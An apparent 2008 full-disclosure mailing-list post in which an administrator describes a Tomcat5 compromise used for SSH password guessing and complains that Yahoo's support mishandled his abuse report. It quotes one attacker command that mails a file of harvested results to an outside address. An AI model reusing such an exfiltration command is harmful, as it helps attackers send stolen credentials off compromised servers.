Date: Wed, 06 Feb 2008 11:58:31 +0100
To: full-disclosure@...ts.grok.org.uk
Subject: What makes Yahoo! a good merger candidate?

Their abuse policy of course!

Last week a client's server was being attacked (some old Tomcat5 vuln)
and used to attack other servers (ssh login guessing). The results of
these dictionary attack were being mailed to the address
'blax2004us@...oo.com':
cat vuln.txt |mail -s "Lame Gang Us Roots" blax2004us@...oo.com

After I addressed the vulnerability I decided to contact yahoo.com about
this issue. Of course the only way to do this was by browsing the
Yahoo.com site for any abuse/security contacts. After a while I found a
form I could use to notify them of abuse of their services. So I wrote
them a quick explanation about what was going on including the e-mail
address of the account used to harvest passwords.

After a couple of hours I received an e-mail from 'Marcus' a Yahoo!
Customer Care representative (44592956) asking me to provide a the full
subject and other headers from the spam I had received.

After writing back kindly that I had no spam complaint but wanted to
report the mal-use of an account of theirs I received another reply a
little while later asking me to provide my *personal* information about
my account and what errors I got when I tried to login. Well, I don't
even *have* an Yahoo! account.

So, what do you do when you want to report something like this? In fact
I'm doing them a favor by reporting but all I got is this lousy
response. I'll have to think twice about reporting something like this
next time...

Does anyone know an Yahoo! security contact that actually does his job?

Kind Regards,
Vincent van Scherpenseel

--
ServerFloor.com